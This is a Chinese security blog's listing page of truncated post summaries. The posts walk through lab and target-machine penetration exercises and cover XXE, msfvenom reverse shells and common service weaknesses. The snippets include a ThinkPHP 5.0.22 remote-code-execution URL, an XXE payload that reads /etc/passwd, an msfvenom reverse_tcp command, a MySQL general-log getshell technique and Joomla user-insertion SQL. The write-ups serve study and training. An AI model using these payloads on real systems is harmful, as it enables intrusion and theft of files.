bingtanghulu

2020年8月23日

摘要：一、信息收集 cms扫描端口扫描目录扫描输入错误路径，发现是5.0.22版本查找poc 命令执行插入木马 http://192.168.62.128?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0 阅读全文

posted @ 2020-08-23 13:37 bingtanghulu 阅读(194) 评论(0) 推荐(0) 编辑

红日靶机四

摘要：信息收集 2001端口 2002端口抓包修改为PUT请求，上传木马，前面加/ python -c 'import pty; pty.spawn("/bin/bash")' 添加代理个人原因重置 kali IP地址改为 192.168.1.128 centos IP地址为192.168.1.13 阅读全文

posted @ 2020-08-23 13:36 bingtanghulu 阅读(148) 评论(0) 推荐(0) 编辑

红日靶机三

摘要：信息收集 testuser / cvcvgjASD!@ 爆破失败登录数据成功 joomlaCMS公开漏洞 mysql -uroot -p123 -h 192.168.1.110 INSERT INTO `am2zu_users`(`name`, `username`, `password`, `p 阅读全文

posted @ 2020-08-23 13:35 bingtanghulu 阅读(184) 评论(0) 推荐(0) 编辑

红日靶机二

摘要：信息收集失败了换一个漏洞木马上传 meterpreter > background msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester msf5 post(multi/recon/local_ex 阅读全文

posted @ 2020-08-23 13:34 bingtanghulu 阅读(201) 评论(0) 推荐(0) 编辑

红日靶机一

摘要：一、获取shell show variables like '%general%'; #查看日志状态当开启general时，所执行的sql语句都会出现在stu1.log文件中。那么，如果修改generallogfile的值，那么所执行的sql语句就会对应生成对应的文件中，进而getshell。SE 阅读全文

posted @ 2020-08-23 13:33 bingtanghulu 阅读(245) 评论(0) 推荐(0) 编辑

2020年8月11日

常见端口

摘要： tomcat--80/8080/8009 manager 弱口令 put上传webshell http慢速攻击幽灵猫-文件包含 jboss 后台弱口令控制台部署war包 JAVA反序列化远程代码执行 webSphere--9080 后台弱口令任意文件泄漏 JAVA反序列化 weblogic- 阅读全文

posted @ 2020-08-11 13:40 bingtanghulu 阅读(302) 评论(0) 推荐(0) 编辑

2020年7月27日

msf反弹

摘要：转载https://www.cnblogs.com/xishaonian/p/7721584.html msf 生成反弹 Windows Shell msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.62.129 lport=1234 阅读全文

posted @ 2020-07-27 15:06 bingtanghulu 阅读(331) 评论(0) 推荐(0) 编辑

xxe 回显与无回显

摘要：转载学习于红日安全一、有回显（1）直接将外部实体引用的URI设置为敏感目录 <!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo> （2）将外部实体引用的 U 阅读全文

posted @ 2020-07-27 10:02 bingtanghulu 阅读(2351) 评论(0) 推荐(0) 编辑

2020年7月26日

信息收集

摘要：学习转载红日安全 1、robots.txt 2.网站备份压缩文件文件可直接访问并下载。可能为.rar、zip、.7z、.tar.gz、.bak、.txt、.swp等等，以及和网站信息有关的文件名www.rar、web、rar等等 3.Git导致文件泄露在运行gitinit初始化代码库的时候，会在阅读全文

posted @ 2020-07-26 19:05 bingtanghulu 阅读(170) 评论(0) 推荐(0) 编辑

2020年7月16日

RTB1靶机

摘要：一、信息收集信息收集 http://192.168.111.132/Hackademic_RTB1/?cat=1 http://192.168.111.132/Hackademic_RTB1/?cat=1%27 http://192.168.111.132/Hackademic_RTB1/?cat 阅读全文

posted @ 2020-07-16 11:50 bingtanghulu 阅读(272) 评论(0) 推荐(0) 编辑

公告